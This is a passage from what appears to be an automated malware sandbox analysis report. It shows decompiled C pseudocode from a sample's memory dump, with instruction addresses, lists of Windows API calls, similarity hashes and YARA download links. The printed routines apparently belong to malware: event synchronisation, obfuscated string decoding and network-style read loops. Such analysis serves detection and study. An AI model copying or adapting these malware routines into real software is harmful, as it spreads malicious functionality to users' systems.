												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x044b4b76
0x044b4b7f
0x044b4b80
0x044b4b84
0x044b4b8a
0x044b4b90
0x044b4b99
0x044b4b9f
0x044b4ba9
0x044b4bab
0x044b4bb1
0x044b4bb6
0x044b4bc1
0x044b4bc7
0x044b4bcc
0x044b4cee
0x044b4bd2
0x044b4bd2
0x044b4bdf
0x044b4be5
0x044b4beb
0x044b4bef
0x044b4bf5
0x044b4c02
0x044b4c06
0x044b4c0c
0x044b4c0f
0x044b4c17
0x044b4c18
0x044b4c1c
0x044b4c20
0x044b4c23
0x044b4c26
0x044b4c2c
0x044b4c35
0x044b4c3b
0x044b4c3c
0x044b4c3f
0x044b4c40
0x044b4c41
0x044b4c49
0x044b4c4a
0x044b4c4b
0x044b4c4d
0x044b4c51
0x044b4c55
0x00000000
0x00000000
0x044b4c5b
0x044b4c64
0x044b4c6a
0x044b4c74
0x044b4c78
0x044b4c7a
0x044b4c87
0x044b4c8b
0x044b4c93
0x044b4c98
0x044b4caa
0x044b4cac
0x044b4cb2
0x044b4cb2
0x044b4cbb
0x044b4cbb
0x044b4cbd
0x044b4cc3
0x044b4cc3
0x044b4cc6
0x044b4ccc
0x044b4ccf
0x044b4cd8
0x00000000
0x00000000
0x00000000
0x044b4cd8
0x044b4c2c
0x044b4c26
0x044b4c0f
0x044b4cde
0x044b4cde
0x044b4ce4
0x044b4ce4
0x044b4cea
0x044b4cea
0x044b4cf3
0x044b4cf9
0x044b4cf9
0x044b4bb6
0x044b4d02

APIs

SysAllocString.OLEAUT32(044BC298), ref: 044B4BC1
lstrcmpW.KERNEL32(00000000,0076006F), ref: 044B4CA2
SysFreeString.OLEAUT32(00000000), ref: 044B4CBB
SysFreeString.OLEAUT32(?), ref: 044B4CEA

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 75432acfab8e65a5a65175cd6ba93c4d213ffeef59db01e8e8df084a5f691211
Instruction ID: 6d2ac0ee303b3a5e349af6b31f846f7d97fec9e4f17cd43b0691cfd5eea5d289
Opcode Fuzzy Hash: 75432acfab8e65a5a65175cd6ba93c4d213ffeef59db01e8e8df084a5f691211
Instruction Fuzzy Hash: 7C512C75D0051AEFCF01DFA8C8889EEB7B9FF89704B154699E915EB211D731AD02CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 044B4D8C, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E044B4D8C(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E044B4481(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E044B65B9(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E044B8344(_t101,  &_v236, _a8, _t96 - _t81);
					E044B8344(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E044B65B9(_t101, 0x44bd1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E044B65B9(_a16, _a4);
						E044B4492(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L044BAE98();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L044BAE92();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E044B8643(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E044B805E(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E044B3A3C(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x44bd1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x044b4d8f
0x044b4d9b
0x044b4da1
0x044b4da6
0x044b4daa
0x044b4f07
0x044b4f0b
0x044b4f0b
0x044b4db0
0x044b4db4
0x044b4db8
0x044b4dbb
0x044b4dc6
0x044b4dcc
0x044b4dd1
0x044b4dd4
0x044b4dee
0x044b4dfa
0x044b4e03
0x044b4e0d
0x044b4e12
0x044b4e14
0x044b4e17
0x044b4ec5
0x044b4ecb
0x044b4edc
0x044b4eef
0x044b4eff
0x00000000
0x044b4f04
0x044b4e20
0x044b4e27
0x044b4e2b
0x044b4e31
0x044b4e33
0x044b4e35
0x044b4e37
0x044b4e39
0x044b4e43
0x044b4e48
0x044b4e4a
0x044b4e4c
0x044b4e4d
0x044b4e4e
0x044b4e4f
0x044b4e56
0x044b4e5d
0x044b4e60
0x044b4e60
0x044b4e2d
0x044b4e2d
0x044b4e2d
0x044b4e68
0x044b4e70
0x044b4e79
0x044b4e7e
0x044b4e7e
0x044b4e83
0x00000000
0x00000000
0x044b4e85
0x044b4e88
0x044b4e92
0x00000000
0x00000000
0x044b4e94
0x044b4e94
0x044b4e9e
0x044b4e7e
0x044b4e83
0x00000000
0x00000000
0x00000000
0x044b4e83
0x044b4ea8
0x044b4eab
0x044b4eae
0x044b4eb5
0x044b4eb5
0x044b4ec2
0x00000000
0x044b4ec2
0x044b4dbd
0x044b4dc1
0x044b4dc2
0x044b4dc4
0x00000000
0x00000000
0x00000000
0x044b4dc4
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 044B4E39
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 044B4E4F
memset.NTDLL ref: 044B4EEF
memset.NTDLL ref: 044B4EFF

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: a4d286a8c390e92753b05e809d85b5c84a6fac3bb57226c8653a430691c027bd
Instruction ID: f4d766ff8237d4815f067289e5e99cf0a889f78144e98250ddc812ca6c4a7948
Opcode Fuzzy Hash: a4d286a8c390e92753b05e809d85b5c84a6fac3bb57226c8653a430691c027bd
Instruction Fuzzy Hash: 86419371A00219ABEF10DFA9DC40BDE7768EF45314F00852AF959A7282DB70BD558BE0

Uniqueness

Uniqueness Score: -1.00%

Function 044BA77A, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,75144D40), ref: 044BA78C

Part of subcall function 044B6D10: RtlAllocateHeap.NTDLL(00000000,-00000008,044B5D29), ref: 044B6D1C

ResetEvent.KERNEL32(?), ref: 044BA800
GetLastError.KERNEL32 ref: 044BA823
GetLastError.KERNEL32 ref: 044BA8CE

Part of subcall function 044B45B3: HeapFree.KERNEL32(00000000,00000000,044B5DE9,00000000,?,?,-00000008), ref: 044B45BF

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: ebe02e20a7e79908cf67b7868c1ad321b140b7d539df348054232b511a99f1fc
Instruction ID: 3485ae9b467871e710d211af6a392a808c36b2013e8632ef6c13446c510819cf
Opcode Fuzzy Hash: ebe02e20a7e79908cf67b7868c1ad321b140b7d539df348054232b511a99f1fc
Instruction Fuzzy Hash: A6417F71900604BFEB319FA5CC88D9B7BBDEB85704B10492AF582E1690E774E915CFB0

Uniqueness

Uniqueness Score: -1.00%

Function 044B4597, Relevance: 6.1, APIs: 4, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E044B4597(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x44bd138() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x44bd168(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E044B6D10(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x44bd138() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E044B5802( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E044B45B3(_v16);
										if(_t64 == 0) {
											_t64 = E044B6C55(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E044B5802( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E044B4383(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x044b4597
0x044b4598
0x044b459e
0x044b45a9
0x044b45a9
0x044b45ab
0x044b5a53
0x044b5a58
0x044b5a5a
0x044b5a5f
0x044b5a60
0x044b5a65
0x044b5a66
0x044b5a71
0x044b5aa2
0x044b5aa7
0x044b5b6a
0x044b5aad
0x044b5ab4
0x044b5abc
0x044b5b67
0x044b5ac2
0x044b5ac7
0x044b5acc
0x044b5ad1
0x044b5b59
0x044b5ad7
0x044b5ad7
0x044b5ad9
0x044b5adf
0x044b5ae0
0x044b5ae0
0x044b5ae3
0x044b5ae6
0x044b5aec
0x044b5af1
0x044b5af2
0x044b5af7
0x044b5afa
0x044b5b05
0x00000000
0x00000000
0x044b5b0d
0x044b5b15
0x044b5b21
0x044b5b25
0x044b5b27
0x044b5b2c
0x00000000
0x00000000
0x044b5b2c
0x044b5b25
0x044b5b3e
0x044b5b41
0x044b5b48
0x044b5b53
0x044b5b53
0x00000000
0x044b5b2e
0x044b5b2e
0x044b5b33
0x044b5b35
0x044b5b36
0x044b5b39
0x00000000
0x044b5b39
0x00000000
0x044b5b33
0x044b5ae0
0x044b5b5a
0x044b5b5a
0x044b5b60
0x044b5b60
0x044b5abc
0x044b5a73
0x044b5a79
0x044b5a81
0x044b5a9a
0x044b5a9c
0x00000000
0x00000000
0x044b5a83
0x044b5a8d
0x044b5a91
0x044b5a97
0x00000000
0x044b5a97
0x044b5a91
0x044b5a81
0x044b5b73
0x044b45a0
0x044b45a0
0x044b45a7
0x044b45b2
0x00000000
0x00000000
0x00000000
0x044b45a7

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,751881D0,00000000,00000000), ref: 044B5A5A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,044B896D,00000000,?,?), ref: 044B5A73
ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,044B896D,00000000,?), ref: 044B5AEC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,044B896D,00000000,?,?), ref: 044B5B07

Part of subcall function 044B4383: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,751881D0,00000000,00000000), ref: 044B439A
Part of subcall function 044B4383: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,044B896D,00000000,?), ref: 044B43AA

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$ObjectSingleWait
String ID:
API String ID: 1123145548-0
Opcode ID: 4ea3527bac60e49b3792601bd7cf71e2147d0634d4a8abc036b4c47b776a3579
Instruction ID: 3444cdc53598fb21b0986674cba1d3262706c7f14fe9e10aadec11ddc0d2a61b
Opcode Fuzzy Hash: 4ea3527bac60e49b3792601bd7cf71e2147d0634d4a8abc036b4c47b776a3579
Instruction Fuzzy Hash: 50418432A04604FBDF219FA5CC44EEBF7B9EF48268F14056AE591A7290E670F94197B0

Uniqueness

Uniqueness Score: -1.00%

Function 044B8F5F, Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E044B8F5F(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x44bd270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x44bd2a4; // 0x8ca5a8
				_t3 = _t8 + 0x44be836; // 0x61636f4c
				_t25 = 0;
				_t30 = E044B1C78(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x44bd2a8, 1, 0, _t30);
					E044B45B3(_t30);
				}
				_t12 =  *0x44bd25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E044B5946() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E044B49B7(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x44bd110( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E044B5C56(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x044b8f60
0x044b8f67
0x044b8f71
0x044b8f75
0x044b8f7b
0x044b8f8a
0x044b8f91
0x044b8f95
0x044b8fa7
0x044b8fa9
0x044b8fa9
0x044b8fae
0x044b8fb5
0x044b900c
0x044b900c
0x044b9012
0x044b9014
0x044b9014
0x044b901e
0x044b9022
0x044b9034
0x044b9034
0x044b9038
0x044b903e
0x044b903e
0x00000000
0x044b8fce
0x044b8fd3
0x044b8fdb
0x044b8fdf
0x044b8fe3
0x044b8fe3
0x044b8ff0
0x044b8ff4
0x044b8ff8
0x044b904d
0x044b9053
0x044b9053
0x044b9006
0x044b900a
0x044b9041
0x044b9043
0x044b9046
0x044b9046
0x00000000
0x044b9043
0x044b900a
0x00000000
0x044b8ff4

APIs

Part of subcall function 044B1C78: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,044B8594,74666F53,00000000,?,044BD00C,?,?), ref: 044B1CAE
Part of subcall function 044B1C78: lstrcpy.KERNEL32(00000000,00000000), ref: 044B1CD2
Part of subcall function 044B1C78: lstrcat.KERNEL32(00000000,00000000), ref: 044B1CDA

CreateEventA.KERNEL32(044BD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,044B8204,?,?,?), ref: 044B8FA0

Part of subcall function 044B45B3: HeapFree.KERNEL32(00000000,00000000,044B5DE9,00000000,?,?,-00000008), ref: 044B45BF

WaitForSingleObject.KERNEL32(00000000,00004E20,044B8204,00000000,00000000,?,00000000,?,044B8204,?,?,?), ref: 044B9000
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,044B8204,?,?,?), ref: 044B902E
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,044B8204,?,?,?), ref: 044B9046

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 585cb590fb6a8febb17128cbdb13da37b6baf3ad239edc30d0038fa036277939
Instruction ID: 49f32f4a105ce138160f21da0a6e5cbc378e3001442de20bb89bacd7be1a5ab8
Opcode Fuzzy Hash: 585cb590fb6a8febb17128cbdb13da37b6baf3ad239edc30d0038fa036277939
Instruction Fuzzy Hash: CC21EBB2500B51ABEF315F6D9C84ADB73A9EF44714B15052BFAC5D7342D664EC0186F0

Uniqueness

Uniqueness Score: -1.00%

Function 044B4383, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E044B4383(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x44bd140; // 0x44bab51
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E044B6D10(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E044B45B3(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E044B5802( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x044b4383
0x044b4383
0x044b438d
0x044b4393
0x044b4396
0x044b439a
0x044b43a0
0x044b43a5
0x044b43be
0x044b43c1
0x044b43c5
0x044b43c9
0x044b43ca
0x044b43cf
0x044b43d2
0x044b43d9
0x044b43e0
0x044b4433
0x044b4439
0x044b443f
0x044b447a
0x044b4480
0x00000000
0x00000000
0x00000000
0x044b443f
0x044b43e6
0x00000000
0x044b43ed
0x044b43fb
0x044b43fe
0x044b4401
0x044b440d
0x044b4411
0x044b4473
0x044b4413
0x044b4416
0x044b441a
0x044b441b
0x044b441c
0x044b441e
0x044b4425
0x044b4463
0x044b446e
0x044b4427
0x044b442a
0x044b442e
0x044b442e
0x044b4425
0x00000000
0x044b4411
0x044b43e6
0x044b43aa
0x044b43b0
0x044b43b3
0x044b43b8
0x00000000
0x00000000
0x00000000
0x044b4448
0x044b4450
0x044b4455
0x044b4458
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,751881D0,00000000,00000000), ref: 044B439A
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,044B896D,00000000,?), ref: 044B43AA
GetLastError.KERNEL32 ref: 044B4433

Part of subcall function 044B5802: WaitForMultipleObjects.KERNEL32(00000002,044BA841,00000000,044BA841,?,?,?,044BA841,0000EA60), ref: 044B581D

Part of subcall function 044B45B3: HeapFree.KERNEL32(00000000,00000000,044B5DE9,00000000,?,?,-00000008), ref: 044B45BF

GetLastError.KERNEL32(00000000), ref: 044B4468

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: 277fec0c403f6aa89e1aa0a8c71edde4374b96b9a7dbf81f213ce760de5941e4
Instruction ID: 585b7860d2786239981ca2f79308e4997e38d2da0b993ad549401af47aec90bd
Opcode Fuzzy Hash: 277fec0c403f6aa89e1aa0a8c71edde4374b96b9a7dbf81f213ce760de5941e4
Instruction Fuzzy Hash: 633110B5900709EFDF20DFE5C8C59DFB7F8EB04304F10496AE582A2241D774AA599FA0

Uniqueness

Uniqueness Score: -1.00%

Function 044B8155, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E044B8155(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E044B6427(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E044BA468(_t23);
						}
					}
					return _t38;
				}
				if(E044B3A8E(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x44bd2a8, 1, 0,  *0x44bd340);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E044B822C(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E044B8C1A(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E044B3B83(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E044B8F5F( &_v32, _t39);
					goto L13;
				}
			}

0x044b8155
0x044b8162
0x044b8168
0x044b8169
0x044b816a
0x044b816b
0x044b816c
0x044b8170
0x044b817c
0x044b8180
0x044b8208
0x044b8208
0x044b820b
0x044b820d
0x044b8215
0x044b821b
0x044b821e
0x044b821e
0x044b821b
0x044b8229
0x044b8229
0x044b8193
0x044b8195
0x044b8195
0x044b81ac
0x044b81b0
0x044b81b3
0x044b81be
0x044b81c5
0x044b81c5
0x044b81ce
0x044b81d2
0x044b81e0
0x044b81d4
0x044b81d4
0x044b81d5
0x044b81d6
0x044b81d7
0x044b81d8
0x044b81d9
0x044b81d9
0x044b81e5
0x044b81e8
0x044b81ec
0x044b81ee
0x044b81ee
0x044b81f5
0x00000000
0x044b81f7
0x044b81f7
0x044b8204
0x00000000
0x044b8204

APIs

CreateEventA.KERNEL32(044BD2A8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 044B81A6
SetEvent.KERNEL32(00000000), ref: 044B81B3
Sleep.KERNEL32(00000BB8), ref: 044B81BE
CloseHandle.KERNEL32(00000000), ref: 044B81C5

Part of subcall function 044B822C: WaitForSingleObject.KERNEL32(00000000,?,?,?,044B81E5,?,044B81E5,?,?,?,?,?,044B81E5,?), ref: 044B8306

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: e1aafaca7d019f4f83aa8cf3cf07241d5a6dec40da552f1c1f23960f92c25de5
Instruction ID: 50819415e8fa29eec3458ff426eec538292e081aad2cb31b2151a439119d8363
Opcode Fuzzy Hash: e1aafaca7d019f4f83aa8cf3cf07241d5a6dec40da552f1c1f23960f92c25de5
Instruction Fuzzy Hash: 53216273D00519ABDF20BFE598C48EFB7BDEF44255B05482BEA91A7200D674B9418BF0

Uniqueness

Uniqueness Score: -1.00%

Function 044B2070, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E044B2070(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
